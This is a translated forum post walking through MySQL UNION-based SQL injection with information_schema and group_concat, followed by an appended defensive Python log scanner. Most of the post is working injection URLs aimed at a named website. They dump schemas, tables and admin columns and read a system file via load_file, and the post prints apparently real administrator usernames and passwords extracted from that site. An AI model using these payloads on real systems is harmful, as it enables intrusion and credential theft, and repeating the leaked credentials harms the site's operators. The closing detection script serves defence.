This method only works on MySQL 5.0 and later; the injection procedure is similar to the usual MySQL 5 approach,
but it greatly speeds up reading out the database. It is not my own idea; it originally comes from a foreign expert.

The advantage is that information_schema combined with group_concat lets you read the contents of a given database in one go, and injection still works when LIMIT is restricted.
The downside: when a database has hundreds or even thousands of tables, columns and rows, reading the data out becomes quite slow...

Below is a simple demonstration. I won't go into the principle; anyone who does injection regularly already knows it. Only the important parts are shown.
Adapt to the actual situation when injecting, e.g. if spaces are filtered, use /**/, +, etc.
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

Read all databases:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA

Read all tables:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

Read all columns of a table:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
(97,100,109,105,110) is the ASCII encoding of admin; other names are encoded the same way.

Read the contents of the columns:
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin

http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23

http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23

http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
Result: webmaster:dzb521123,simlab:simadmin20043233
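As an added defensive example (not part of the original post), the Python below inspects web-server access-log lines for the enumeration pattern described above: it undoes the evasions the post lists (+/%xx encoding, /**/ in place of spaces), decodes CHAR() sequences back into the identifier or path they spell out, and flags the UNION SELECT / information_schema / group_concat / load_file combination. The log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): one normal
# request and two shaped like the information_schema/group_concat payloads
# the post walks through, including the CHAR() and /**/ tricks it mentions.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /1.php?id=17 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "GET /1.php?id=-1+union+select+1,'
    'group_concat(column_name)+from+information_schema.COLUMNS+where+'
    'table_name=char(97,100,109,105,110) HTTP/1.1" 200 913',
    '203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /1.php?id=-1/**/union/**/'
    'select/**/1,load_file(CHAR(99,58,92,98,111,111,116,46,105,110,105)) HTTP/1.1" 200 2048',
]

REQUEST_PATH = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
CHAR_CALL = re.compile(r"char\s*\(\s*((?:\d+\s*,\s*)*\d+)\s*\)", re.I)
# Keyword combinations characteristic of this enumeration technique.
INDICATORS = ("union select", "information_schema", "group_concat(", "load_file(")

def normalize(query: str) -> str:
    """Undo the evasions the post lists: '+' and %xx encoding, /**/ as a
    space substitute, and runs of whitespace; returns lower-case text."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text).lower()

def decode_char_calls(sql: str) -> str:
    """Replace CHAR(97,100,...) with the quoted literal it spells out so an
    analyst sees which identifier or file path the request was reading."""
    def repl(match):
        codes = [int(c) for c in match.group(1).split(",")]
        text = "".join(chr(c) if 32 <= c < 127 else "?" for c in codes)
        return f"'{text}'"
    return CHAR_CALL.sub(repl, sql)

def inspect_request(log_line: str) -> dict:
    """Classify one log line; returns the decoded query and matched indicators."""
    match = REQUEST_PATH.search(log_line)
    path = match.group(1) if match else ""
    decoded = decode_char_calls(normalize(path))
    hits = [i for i in INDICATORS if i in decoded]
    return {"suspicious": bool(hits), "indicators": hits, "decoded": decoded}

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        verdict = inspect_request(line)
        if verdict["suspicious"]:
            print("ALERT", verdict["indicators"], verdict["decoded"])
```

Running it prints one ALERT per injected line with the decoded query, e.g. table_name='admin' instead of the CHAR() sequence; feed it real log lines via inspect_request to triage in bulk.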